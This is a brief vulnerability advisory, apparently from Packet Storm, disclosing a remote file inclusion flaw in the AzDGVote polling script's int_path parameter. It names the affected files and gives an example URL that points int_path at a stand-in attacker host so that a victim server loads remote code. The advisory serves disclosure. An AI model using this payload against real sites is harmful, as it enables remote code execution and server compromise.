AzDGVote suffers from a remote file inclusion vulnerability.
5fe9fcb1b1ad616c7aad90e8fa4ad3129b3943b2df8ec62e4d69fdccc91306ffAzDGVote File inclusion
---------------------------------
Site:https://www.azdg.com/
Demo:https://www.azdg.com/scripts/AzDGVote/vote.php?id=1
---------------------------------------
File inclusion
include $int_path."/AzDG.template.inc.php";
int_path parameter File inclusion
Aut File
vote.php,view.php,admin.php
and /admin/index.php
---------------------------------------
example
https://victim.com/poll/view.php?int_path=https://evilsite
-----------------------------------------
Discovered By SnIpEr_SA
E-mail:selfar2002@hotmail.com,SnIpEr_SA@bsdmail.org
Site: www.3asfh.com www.lezr.com
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed